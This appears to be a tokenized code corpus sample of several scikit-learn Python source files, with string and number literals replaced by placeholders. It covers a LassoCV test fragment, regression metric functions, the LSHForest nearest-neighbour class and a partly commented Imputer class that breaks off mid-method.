fit ) ( X , y ) <EOL> clfd = LassoCV ( max_iter = <NUM_LIT:100> , cv = <NUM_LIT:4> , normalize = normalize ) <EOL> ignore_warnings ( clfd . fit ) ( X . toarray ( ) , y ) <EOL> assert_almost_equal ( clfs . alpha_ , clfd . alpha_ , <NUM_LIT:7> ) <EOL> assert_almost_equal ( clfs . intercept_ , clfd . intercept_ , <NUM_LIT:7> ) <EOL> assert_array_almost_equal ( clfs . mse_path_ , clfd . mse_path_ ) <EOL> assert_array_almost_equal ( clfs . alphas_ , clfd . alphas_ ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import numpy as np <EOL> from . . utils . validation import check_array , check_consistent_length <EOL> from . . utils . validation import column_or_1d <EOL> from . . externals . six import string_types <EOL> import warnings <EOL> __ALL__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> def _check_reg_targets ( y_true , y_pred , multioutput ) : <EOL> """<STR_LIT>""" <EOL> check_consistent_length ( y_true , y_pred ) <EOL> y_true = check_array ( y_true , ensure_2d = False ) <EOL> y_pred = check_array ( y_pred , ensure_2d = False ) <EOL> if y_true . ndim == <NUM_LIT:1> : <EOL> y_true = y_true . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> if y_pred . ndim == <NUM_LIT:1> : <EOL> y_pred = y_pred . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> if y_true . shape [ <NUM_LIT:1> ] != y_pred . shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( y_true . shape [ <NUM_LIT:1> ] , y_pred . shape [ <NUM_LIT:1> ] ) ) <EOL> n_outputs = y_true . shape [ <NUM_LIT:1> ] <EOL> multioutput_options = ( None , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> if multioutput not in multioutput_options : <EOL> multioutput = check_array ( multioutput , ensure_2d = False ) <EOL> if n_outputs == <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif n_outputs != len ( multioutput ) : <EOL> raise ValueError ( ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> ( len ( multioutput ) , n_outputs ) ) <EOL> y_type = '<STR_LIT>' if n_outputs == <NUM_LIT:1> else '<STR_LIT>' <EOL> return y_type , y_true , y_pred , multioutput <EOL> def mean_absolute_error ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> output_errors = np . average ( np . 
abs ( y_pred - y_true ) , <EOL> weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_errors <EOL> elif multioutput == '<STR_LIT>' : <EOL> multioutput = None <EOL> return np . average ( output_errors , weights = multioutput ) <EOL> def mean_squared_error ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> output_errors = np . average ( ( y_true - y_pred ) ** <NUM_LIT:2> , axis = <NUM_LIT:0> , <EOL> weights = sample_weight ) <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_errors <EOL> elif multioutput == '<STR_LIT>' : <EOL> multioutput = None <EOL> return np . average ( output_errors , weights = multioutput ) <EOL> def median_absolute_error ( y_true , y_pred ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , _ = _check_reg_targets ( y_true , y_pred , <EOL> '<STR_LIT>' ) <EOL> if y_type == '<STR_LIT>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return np . median ( np . abs ( y_pred - y_true ) ) <EOL> def explained_variance_score ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> y_diff_avg = np . average ( y_true - y_pred , weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> numerator = np . average ( ( y_true - y_pred - y_diff_avg ) ** <NUM_LIT:2> , <EOL> weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> y_true_avg = np . average ( y_true , weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> denominator = np . 
average ( ( y_true - y_true_avg ) ** <NUM_LIT:2> , <EOL> weights = sample_weight , axis = <NUM_LIT:0> ) <EOL> nonzero_numerator = numerator != <NUM_LIT:0> <EOL> nonzero_denominator = denominator != <NUM_LIT:0> <EOL> valid_score = nonzero_numerator & nonzero_denominator <EOL> output_scores = np . ones ( y_true . shape [ <NUM_LIT:1> ] ) <EOL> output_scores [ valid_score ] = <NUM_LIT:1> - ( numerator [ valid_score ] / <EOL> denominator [ valid_score ] ) <EOL> output_scores [ nonzero_numerator & ~ nonzero_denominator ] = <NUM_LIT:0.> <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_scores <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = None <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = denominator <EOL> else : <EOL> avg_weights = multioutput <EOL> return np . average ( output_scores , weights = avg_weights ) <EOL> def r2_score ( y_true , y_pred , <EOL> sample_weight = None , <EOL> multioutput = None ) : <EOL> """<STR_LIT>""" <EOL> y_type , y_true , y_pred , multioutput = _check_reg_targets ( <EOL> y_true , y_pred , multioutput ) <EOL> if sample_weight is not None : <EOL> sample_weight = column_or_1d ( sample_weight ) <EOL> weight = sample_weight [ : , np . newaxis ] <EOL> else : <EOL> weight = <NUM_LIT:1.> <EOL> numerator = ( weight * ( y_true - y_pred ) ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:0> , <EOL> dtype = np . float64 ) <EOL> denominator = ( weight * ( y_true - np . average ( <EOL> y_true , axis = <NUM_LIT:0> , weights = sample_weight ) ) ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:0> , <EOL> dtype = np . float64 ) <EOL> nonzero_denominator = denominator != <NUM_LIT:0> <EOL> nonzero_numerator = numerator != <NUM_LIT:0> <EOL> valid_score = nonzero_denominator & nonzero_numerator <EOL> output_scores = np . ones ( [ y_true . 
shape [ <NUM_LIT:1> ] ] ) <EOL> output_scores [ valid_score ] = <NUM_LIT:1> - ( numerator [ valid_score ] / <EOL> denominator [ valid_score ] ) <EOL> output_scores [ nonzero_numerator & ~ nonzero_denominator ] = <NUM_LIT:0.> <EOL> if multioutput is None and y_true . shape [ <NUM_LIT:1> ] != <NUM_LIT:1> : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> multioutput = '<STR_LIT>' <EOL> if isinstance ( multioutput , string_types ) : <EOL> if multioutput == '<STR_LIT>' : <EOL> return output_scores <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = None <EOL> elif multioutput == '<STR_LIT>' : <EOL> avg_weights = denominator <EOL> if not np . any ( nonzero_denominator ) : <EOL> if not np . any ( nonzero_numerator ) : <EOL> return <NUM_LIT:1.0> <EOL> else : <EOL> return <NUM_LIT:0.0> <EOL> else : <EOL> avg_weights = multioutput <EOL> return np . average ( output_scores , weights = avg_weights ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import warnings <EOL> from scipy import sparse <EOL> from . base import KNeighborsMixin , RadiusNeighborsMixin <EOL> from . . base import BaseEstimator <EOL> from . . utils . validation import check_array <EOL> from . . utils import check_random_state <EOL> from . . metrics . pairwise import pairwise_distances <EOL> from . . random_projection import GaussianRandomProjection <EOL> __all__ = [ "<STR_LIT>" ] <EOL> HASH_DTYPE = '<STR_LIT>' <EOL> MAX_HASH_SIZE = np . dtype ( HASH_DTYPE ) . itemsize * <NUM_LIT:8> <EOL> def _find_matching_indices ( tree , bin_X , left_mask , right_mask ) : <EOL> """<STR_LIT>""" <EOL> left_index = np . searchsorted ( tree , bin_X & left_mask ) <EOL> right_index = np . searchsorted ( tree , bin_X | right_mask , <EOL> side = '<STR_LIT:right>' ) <EOL> return left_index , right_index <EOL> def _find_longest_prefix_match ( tree , bin_X , hash_size , <EOL> left_masks , right_masks ) : <EOL> """<STR_LIT>""" <EOL> hi = np . empty_like ( bin_X , dtype = np . intp ) <EOL> hi . fill ( hash_size ) <EOL> lo = np . zeros_like ( bin_X , dtype = np . intp ) <EOL> res = np . empty_like ( bin_X , dtype = np . intp ) <EOL> left_idx , right_idx = _find_matching_indices ( tree , bin_X , <EOL> left_masks [ hi ] , <EOL> right_masks [ hi ] ) <EOL> found = right_idx > left_idx <EOL> res [ found ] = lo [ found ] = hash_size <EOL> r = np . arange ( bin_X . shape [ <NUM_LIT:0> ] ) <EOL> kept = r [ lo < hi ] <EOL> while kept . shape [ <NUM_LIT:0> ] : <EOL> mid = ( lo . take ( kept ) + hi . take ( kept ) ) // <NUM_LIT:2> <EOL> left_idx , right_idx = _find_matching_indices ( tree , <EOL> bin_X . 
take ( kept ) , <EOL> left_masks [ mid ] , <EOL> right_masks [ mid ] ) <EOL> found = right_idx > left_idx <EOL> mid_found = mid [ found ] <EOL> lo [ kept [ found ] ] = mid_found + <NUM_LIT:1> <EOL> res [ kept [ found ] ] = mid_found <EOL> hi [ kept [ ~ found ] ] = mid [ ~ found ] <EOL> kept = r [ lo < hi ] <EOL> return res <EOL> class ProjectionToHashMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _to_hash ( projected ) : <EOL> if projected . shape [ <NUM_LIT:1> ] % <NUM_LIT:8> != <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> out = np . packbits ( ( projected > <NUM_LIT:0> ) . astype ( int ) ) . view ( dtype = HASH_DTYPE ) <EOL> return out . reshape ( projected . shape [ <NUM_LIT:0> ] , - <NUM_LIT:1> ) <EOL> def fit_transform ( self , X , y = None ) : <EOL> self . fit ( X ) <EOL> return self . transform ( X ) <EOL> def transform ( self , X , y = None ) : <EOL> return self . _to_hash ( super ( ProjectionToHashMixin , self ) . transform ( X ) ) <EOL> class GaussianRandomProjectionHash ( ProjectionToHashMixin , <EOL> GaussianRandomProjection ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> n_components = <NUM_LIT:8> , <EOL> random_state = None ) : <EOL> super ( GaussianRandomProjectionHash , self ) . __init__ ( <EOL> n_components = n_components , <EOL> random_state = random_state ) <EOL> def _array_of_arrays ( list_of_arrays ) : <EOL> """<STR_LIT>""" <EOL> out = np . empty ( len ( list_of_arrays ) , dtype = object ) <EOL> out [ : ] = list_of_arrays <EOL> return out <EOL> class LSHForest ( BaseEstimator , KNeighborsMixin , RadiusNeighborsMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , n_estimators = <NUM_LIT:10> , radius = <NUM_LIT:1.0> , n_candidates = <NUM_LIT:50> , <EOL> n_neighbors = <NUM_LIT:5> , min_hash_match = <NUM_LIT:4> , radius_cutoff_ratio = <NUM_LIT> , <EOL> random_state = None ) : <EOL> self . n_estimators = n_estimators <EOL> self . radius = radius <EOL> self . 
random_state = random_state <EOL> self . n_candidates = n_candidates <EOL> self . n_neighbors = n_neighbors <EOL> self . min_hash_match = min_hash_match <EOL> self . radius_cutoff_ratio = radius_cutoff_ratio <EOL> def _compute_distances ( self , query , candidates ) : <EOL> """<STR_LIT>""" <EOL> if candidates . shape == ( <NUM_LIT:0> , ) : <EOL> return np . empty ( <NUM_LIT:0> , dtype = np . int ) , np . empty ( <NUM_LIT:0> , dtype = float ) <EOL> if sparse . issparse ( self . _fit_X ) : <EOL> candidate_X = self . _fit_X [ candidates ] <EOL> else : <EOL> candidate_X = self . _fit_X . take ( candidates , axis = <NUM_LIT:0> , mode = '<STR_LIT>' ) <EOL> distances = pairwise_distances ( query , candidate_X , <EOL> metric = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> distance_positions = np . argsort ( distances ) <EOL> distances = distances . take ( distance_positions , mode = '<STR_LIT>' , axis = <NUM_LIT:0> ) <EOL> return distance_positions , distances <EOL> def _generate_masks ( self ) : <EOL> """<STR_LIT>""" <EOL> tri_size = MAX_HASH_SIZE + <NUM_LIT:1> <EOL> left_mask = np . tril ( np . ones ( ( tri_size , tri_size ) , dtype = int ) ) [ : , <NUM_LIT:1> : ] <EOL> right_mask = left_mask [ : : - <NUM_LIT:1> , : : - <NUM_LIT:1> ] <EOL> self . _left_mask = np . packbits ( left_mask ) . view ( dtype = HASH_DTYPE ) <EOL> self . _right_mask = np . packbits ( right_mask ) . view ( dtype = HASH_DTYPE ) <EOL> def _get_candidates ( self , query , max_depth , bin_queries , n_neighbors ) : <EOL> """<STR_LIT>""" <EOL> index_size = self . _fit_X . shape [ <NUM_LIT:0> ] <EOL> n_candidates = <NUM_LIT:0> <EOL> candidate_set = set ( ) <EOL> min_candidates = self . n_candidates * self . n_estimators <EOL> while ( max_depth > self . min_hash_match and <EOL> ( n_candidates < min_candidates or <EOL> len ( candidate_set ) < n_neighbors ) ) : <EOL> left_mask = self . _left_mask [ max_depth ] <EOL> right_mask = self . _right_mask [ max_depth ] <EOL> for i in range ( self . 
n_estimators ) : <EOL> start , stop = _find_matching_indices ( self . trees_ [ i ] , <EOL> bin_queries [ i ] , <EOL> left_mask , right_mask ) <EOL> n_candidates += stop - start <EOL> candidate_set . update ( <EOL> self . original_indices_ [ i ] [ start : stop ] . tolist ( ) ) <EOL> max_depth -= <NUM_LIT:1> <EOL> candidates = np . fromiter ( candidate_set , count = len ( candidate_set ) , <EOL> dtype = np . intp ) <EOL> if candidates . shape [ <NUM_LIT:0> ] < n_neighbors : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( n_neighbors , self . min_hash_match ) ) <EOL> remaining = np . setdiff1d ( np . arange ( <NUM_LIT:0> , index_size ) , candidates ) <EOL> to_fill = n_neighbors - candidates . shape [ <NUM_LIT:0> ] <EOL> candidates = np . concatenate ( ( candidates , remaining [ : to_fill ] ) ) <EOL> ranks , distances = self . _compute_distances ( query , <EOL> candidates . astype ( int ) ) <EOL> return ( candidates [ ranks [ : n_neighbors ] ] , <EOL> distances [ : n_neighbors ] ) <EOL> def _get_radius_neighbors ( self , query , max_depth , bin_queries , radius ) : <EOL> """<STR_LIT>""" <EOL> ratio_within_radius = <NUM_LIT:1> <EOL> threshold = <NUM_LIT:1> - self . radius_cutoff_ratio <EOL> total_candidates = np . array ( [ ] , dtype = int ) <EOL> total_neighbors = np . array ( [ ] , dtype = int ) <EOL> total_distances = np . array ( [ ] , dtype = float ) <EOL> while ( max_depth > self . min_hash_match and <EOL> ratio_within_radius > threshold ) : <EOL> left_mask = self . _left_mask [ max_depth ] <EOL> right_mask = self . _right_mask [ max_depth ] <EOL> candidates = [ ] <EOL> for i in range ( self . n_estimators ) : <EOL> start , stop = _find_matching_indices ( self . trees_ [ i ] , <EOL> bin_queries [ i ] , <EOL> left_mask , right_mask ) <EOL> candidates . extend ( <EOL> self . original_indices_ [ i ] [ start : stop ] . tolist ( ) ) <EOL> candidates = np . 
setdiff1d ( candidates , total_candidates ) <EOL> total_candidates = np . append ( total_candidates , candidates ) <EOL> ranks , distances = self . _compute_distances ( query , candidates ) <EOL> m = np . searchsorted ( distances , radius , side = '<STR_LIT:right>' ) <EOL> positions = np . searchsorted ( total_distances , distances [ : m ] ) <EOL> total_neighbors = np . insert ( total_neighbors , positions , <EOL> candidates [ ranks [ : m ] ] ) <EOL> total_distances = np . insert ( total_distances , positions , <EOL> distances [ : m ] ) <EOL> ratio_within_radius = ( total_neighbors . shape [ <NUM_LIT:0> ] / <EOL> float ( total_candidates . shape [ <NUM_LIT:0> ] ) ) <EOL> max_depth = max_depth - <NUM_LIT:1> <EOL> return total_neighbors , total_distances <EOL> def fit ( self , X , y = None ) : <EOL> """<STR_LIT>""" <EOL> self . _fit_X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> self . hash_functions_ = [ ] <EOL> self . trees_ = [ ] <EOL> self . original_indices_ = [ ] <EOL> rng = check_random_state ( self . random_state ) <EOL> int_max = np . iinfo ( np . int32 ) . max <EOL> for i in range ( self . n_estimators ) : <EOL> hasher = GaussianRandomProjectionHash ( MAX_HASH_SIZE , <EOL> rng . randint ( <NUM_LIT:0> , int_max ) ) <EOL> hashes = hasher . fit_transform ( self . _fit_X ) [ : , <NUM_LIT:0> ] <EOL> original_index = np . argsort ( hashes ) <EOL> bin_hashes = hashes [ original_index ] <EOL> self . original_indices_ . append ( original_index ) <EOL> self . trees_ . append ( bin_hashes ) <EOL> self . hash_functions_ . append ( hasher ) <EOL> self . _generate_masks ( ) <EOL> return self <EOL> def _query ( self , X ) : <EOL> """<STR_LIT>""" <EOL> bin_queries = np . asarray ( [ hasher . transform ( X ) [ : , <NUM_LIT:0> ] <EOL> for hasher in self . hash_functions_ ] ) <EOL> bin_queries = np . rollaxis ( bin_queries , <NUM_LIT:1> ) <EOL> depths = [ _find_longest_prefix_match ( tree , tree_queries , MAX_HASH_SIZE , <EOL> self . _left_mask , self . 
_right_mask ) <EOL> for tree , tree_queries in zip ( self . trees_ , <EOL> np . rollaxis ( bin_queries , <NUM_LIT:1> ) ) ] <EOL> return bin_queries , np . max ( depths , axis = <NUM_LIT:0> ) <EOL> def kneighbors ( self , X , n_neighbors = None , return_distance = True ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if n_neighbors is None : <EOL> n_neighbors = self . n_neighbors <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> neighbors , distances = [ ] , [ ] <EOL> bin_queries , max_depth = self . _query ( X ) <EOL> for i in range ( X . shape [ <NUM_LIT:0> ] ) : <EOL> neighs , dists = self . _get_candidates ( X [ [ i ] ] , max_depth [ i ] , <EOL> bin_queries [ i ] , <EOL> n_neighbors ) <EOL> neighbors . append ( neighs ) <EOL> distances . append ( dists ) <EOL> if return_distance : <EOL> return np . array ( distances ) , np . array ( neighbors ) <EOL> else : <EOL> return np . array ( neighbors ) <EOL> def radius_neighbors ( self , X , radius = None , return_distance = True ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if radius is None : <EOL> radius = self . radius <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> neighbors , distances = [ ] , [ ] <EOL> bin_queries , max_depth = self . _query ( X ) <EOL> for i in range ( X . shape [ <NUM_LIT:0> ] ) : <EOL> neighs , dists = self . _get_radius_neighbors ( X [ [ i ] ] , max_depth [ i ] , <EOL> bin_queries [ i ] , radius ) <EOL> neighbors . append ( neighs ) <EOL> distances . append ( dists ) <EOL> if return_distance : <EOL> return _array_of_arrays ( distances ) , _array_of_arrays ( neighbors ) <EOL> else : <EOL> return _array_of_arrays ( neighbors ) <EOL> def partial_fit ( self , X , y = None ) : <EOL> """<STR_LIT>""" <EOL> X = check_array ( X , accept_sparse = '<STR_LIT>' ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> return self . 
fit ( X ) <EOL> if X . shape [ <NUM_LIT:1> ] != self . _fit_X . shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> n_samples = X . shape [ <NUM_LIT:0> ] <EOL> n_indexed = self . _fit_X . shape [ <NUM_LIT:0> ] <EOL> for i in range ( self . n_estimators ) : <EOL> bin_X = self . hash_functions_ [ i ] . transform ( X ) [ : , <NUM_LIT:0> ] <EOL> positions = self . trees_ [ i ] . searchsorted ( bin_X ) <EOL> self . trees_ [ i ] = np . insert ( self . trees_ [ i ] , <EOL> positions , bin_X ) <EOL> self . original_indices_ [ i ] = np . insert ( self . original_indices_ [ i ] , <EOL> positions , <EOL> np . arange ( n_indexed , <EOL> n_indexed + <EOL> n_samples ) ) <EOL> if sparse . issparse ( X ) or sparse . issparse ( self . _fit_X ) : <EOL> self . _fit_X = sparse . vstack ( ( self . _fit_X , X ) ) <EOL> else : <EOL> self . _fit_X = np . row_stack ( ( self . _fit_X , X ) ) <EOL> return self </s>
import warnings

import numpy as np
import numpy.ma as ma
from scipy import sparse
from scipy import stats

from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array
from ..utils import safe_mask
from ..utils.fixes import astype
from ..utils.sparsefuncs import _get_median
from ..utils.validation import check_is_fitted
from ..utils.validation import FLOAT_DTYPES
from ..externals import six

# Py2/Py3-compatible lazy iterators; deliberately shadows the builtins
# for the rest of this module.
zip = six.moves.zip
map = six.moves.map

__all__ = [
    '<STR_LIT>',
]


def _get_mask(X, value_to_mask):
    """Return a boolean mask of the entries of X equal to value_to_mask.

    NaN sentinels are handled specially because ``NaN == NaN`` is False:
    when the sentinel is the string placeholder or is itself NaN, the
    mask is computed with ``np.isnan`` instead of equality.
    """
    if value_to_mask == "<STR_LIT>" or np.isnan(value_to_mask):
        return np.isnan(X)
    else:
        return X == value_to_mask


def _most_frequent(array, extra_value, n_repeat):
    """Mode of ``array`` merged with ``extra_value`` repeated ``n_repeat`` times.

    ``array`` holds only explicitly stored entries; ``extra_value`` and
    ``n_repeat`` account for entries not materialized in it (presumably
    the implicit zeros of a sparse column — used that way by
    ``_sparse_fit`` below).
    """
    # Mode of the stored entries; an empty array contributes nothing.
    if array.size > <NUM_LIT:0>:
        mode = stats.mode(array)
        most_frequent_value = mode[<NUM_LIT:0>][<NUM_LIT:0>]
        most_frequent_count = mode[<NUM_LIT:1>][<NUM_LIT:0>]
    else:
        most_frequent_value = <NUM_LIT:0>
        most_frequent_count = <NUM_LIT:0>

    if most_frequent_count == <NUM_LIT:0> and n_repeat == <NUM_LIT:0>:
        # No data at all: no meaningful statistic.
        return np.nan
    elif most_frequent_count < n_repeat:
        return extra_value
    elif most_frequent_count > n_repeat:
        return most_frequent_value
    elif most_frequent_count == n_repeat:
        # Tie between the stored mode and the extra value: return the
        # smaller one so the result is deterministic.
        if most_frequent_value < extra_value:
            return most_frequent_value
        else:
            return extra_value


class Imputer(BaseEstimator, TransformerMixin):
    """Imputation transformer for completing missing values.

    Missing entries (matching ``missing_values``) are replaced by a
    per-feature (``axis=0``) or per-sample (``axis=1``) statistic chosen
    by ``strategy``.  With ``add_indicator_features=True`` the binary
    missingness mask of the imputed features is appended as extra
    columns of the output.
    """

    def __init__(self, missing_values="<STR_LIT>", strategy="<STR_LIT>",
                 axis=<NUM_LIT:0>, verbose=<NUM_LIT:0>, copy=True,
                 add_indicator_features=False):
        self.missing_values = missing_values
        self.strategy = strategy
        self.axis = axis
        self.verbose = verbose
        self.copy = copy
        self.add_indicator_features = add_indicator_features

    def fit(self, X, y=None):
        """Validate parameters and, for ``axis=0``, compute ``statistics_``.

        For ``axis=1`` nothing is precomputed here: the per-sample
        statistics depend on the data passed to ``transform`` and are
        computed there instead.
        """
        allowed_strategies = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>"]
        if self.strategy not in allowed_strategies:
            raise ValueError("<STR_LIT>"
                             "<STR_LIT>".format(allowed_strategies,
                                                self.strategy))

        if self.axis not in [<NUM_LIT:0>, <NUM_LIT:1>]:
            raise ValueError("<STR_LIT>"
                             "<STR_LIT>".format(self.axis))

        if self.axis == <NUM_LIT:0>:
            X = check_array(X, accept_sparse='<STR_LIT>', dtype=np.float64,
                            force_all_finite=False)
            if sparse.issparse(X):
                self.statistics_ = self._sparse_fit(X,
                                                    self.strategy,
                                                    self.missing_values,
                                                    self.axis)
            else:
                self.statistics_ = self._dense_fit(X,
                                                   self.strategy,
                                                   self.missing_values,
                                                   self.axis)
        return self

    def _sparse_fit(self, X, strategy, missing_values, axis):
        """Compute the imputation statistics along ``axis`` of sparse X."""
        # Convert so that the axis of interest maps onto indptr groups.
        if axis == <NUM_LIT:1>:
            X = X.tocsr()
        else:
            X = X.tocsc()

        # Count the implicit zeros per group; when zero itself is the
        # missing sentinel, the stored data already covers everything.
        if missing_values == <NUM_LIT:0>:
            n_zeros_axis = np.zeros(X.shape[not axis], dtype=int)
        else:
            n_zeros_axis = X.shape[axis] - np.diff(X.indptr)

        if strategy == "<STR_LIT>":
            if missing_values != <NUM_LIT:0>:
                n_non_missing = n_zeros_axis

                # Zero out the missing entries so they drop out of sums.
                mask_missing_values = _get_mask(X.data, missing_values)
                mask_valids = np.logical_not(mask_missing_values)
                new_data = X.data.copy()
                new_data[mask_missing_values] = <NUM_LIT:0>
                X = sparse.csc_matrix((new_data, X.indices, X.indptr),
                                      copy=False)
                sums = X.sum(axis=<NUM_LIT:0>)

                # Count stored non-missing entries per group by summing a
                # 0/1 matrix with the same sparsity structure.
                mask_non_zeros = sparse.csc_matrix(
                    (mask_valids.astype(np.float64),
                     X.indices,
                     X.indptr), copy=False)
                s = mask_non_zeros.sum(axis=<NUM_LIT:0>)
                n_non_missing = np.add(n_non_missing, s)
            else:
                sums = X.sum(axis=axis)
                n_non_missing = np.diff(X.indptr)

            # Ignore divide-by-zero: groups with no valid data yield NaN
            # and are filtered out in transform().
            with np.errstate(all="<STR_LIT:ignore>"):
                return np.ravel(sums) / np.ravel(n_non_missing)

        else:
            # median / most_frequent: split the stored data per group and
            # keep only the non-missing entries of each.
            columns_all = np.hsplit(X.data, X.indptr[<NUM_LIT:1>:-<NUM_LIT:1>])
            mask_missing_values = _get_mask(X.data, missing_values)
            mask_valids = np.hsplit(np.logical_not(mask_missing_values),
                                    X.indptr[<NUM_LIT:1>:-<NUM_LIT:1>])
            columns = [col[astype(mask, bool, copy=False)]
                       for col, mask in zip(columns_all, mask_valids)]

            if strategy == "<STR_LIT>":
                median = np.empty(len(columns))
                for i, column in enumerate(columns):
                    # n_zeros_axis accounts for the implicit zeros.
                    median[i] = _get_median(column, n_zeros_axis[i])
                return median

            elif strategy == "<STR_LIT>":
                most_frequent = np.empty(len(columns))
                for i, column in enumerate(columns):
                    most_frequent[i] = _most_frequent(column,
                                                      <NUM_LIT:0>,
                                                      n_zeros_axis[i])
                return most_frequent

    def _dense_fit(self, X, strategy, missing_values, axis):
        """Compute the imputation statistics along ``axis`` of dense X."""
        X = check_array(X, force_all_finite=False)
        mask = _get_mask(X, missing_values)
        masked_X = ma.masked_array(X, mask=mask)

        if strategy == "<STR_LIT>":
            mean_masked = np.ma.mean(masked_X, axis=axis)
            mean = np.ma.getdata(mean_masked)
            # Fully-masked rows/columns get NaN and are dropped later.
            mean[np.ma.getmask(mean_masked)] = np.nan
            return mean

        elif strategy == "<STR_LIT>":
            # Old numpy's ma.median mishandles NaN; fold NaNs into the
            # mask explicitly on those versions.
            if tuple(int(v) for v in np.__version__.split('<STR_LIT:.>')[:<NUM_LIT:2>]) < (<NUM_LIT:1>, <NUM_LIT:5>):
                masked_X.mask = np.logical_or(masked_X.mask,
                                              np.isnan(X))
            median_masked = np.ma.median(masked_X, axis=axis)
            median = np.ma.getdata(median_masked)
            median[np.ma.getmaskarray(median_masked)] = np.nan
            return median

        elif strategy == "<STR_LIT>":
            # Orient so each row of X is one group to impute, then take
            # the mode of the non-missing entries of each row.
            if axis == <NUM_LIT:0>:
                X = X.transpose()
                mask = mask.transpose()
            most_frequent = np.empty(X.shape[<NUM_LIT:0>])
            for i, (row, row_mask) in enumerate(zip(X[:], mask[:])):
                row_mask = np.logical_not(row_mask).astype(np.bool)
                row = row[row_mask]
                # n_repeat=0: all candidate values are in ``row`` itself.
                most_frequent[i] = _most_frequent(row, np.nan, <NUM_LIT:0>)
            return most_frequent

    def _sparse_transform(self, X, valid_stats, valid_idx):
        """Impute missing entries of sparse X in place; optionally append
        the missingness-indicator columns.  Also sets ``imputed_features_``.
        """
        mask = _get_mask(X.data, self.missing_values)
        # Column index of every stored entry, restricted to missing ones.
        indexes = np.repeat(np.arange(len(X.indptr) - <NUM_LIT:1>, dtype=np.int),
                            np.diff(X.indptr))[mask]

        X.data[mask] = astype(valid_stats[indexes], X.dtype,
                              copy=False)

        # Sparse matrix of the missingness mask, same structure as X.
        mask_matrix = X.__class__((mask, X.indices.copy(),
                                   X.indptr.copy()), shape=X.shape,
                                  dtype=X.dtype)
        mask_matrix.eliminate_zeros()
        features_with_missing_values = mask_matrix.sum(axis=<NUM_LIT:0>).A.nonzero()[<NUM_LIT:1>]
        features_mask = safe_mask(mask_matrix, features_with_missing_values)
        imputed_mask = mask_matrix[:, features_mask]
        if self.axis == <NUM_LIT:0>:
            # Map back to original feature indices (invalid features were
            # dropped in transform() before this call).
            self.imputed_features_ = valid_idx[features_with_missing_values]
        else:
            self.imputed_features_ = features_with_missing_values
        if self.add_indicator_features:
            X = sparse.hstack((X, imputed_mask))

        return X

    def _dense_transform(self, X, valid_stats, valid_idx):
        """Impute missing entries of dense X in place; optionally append
        the missingness-indicator columns.  Also sets ``imputed_features_``.
        """
        mask = _get_mask(X, self.missing_values)
        n_missing = np.sum(mask, axis=self.axis)
        # One statistic repeated per missing entry, ordered to match the
        # coordinates built below.
        values = np.repeat(valid_stats, n_missing)

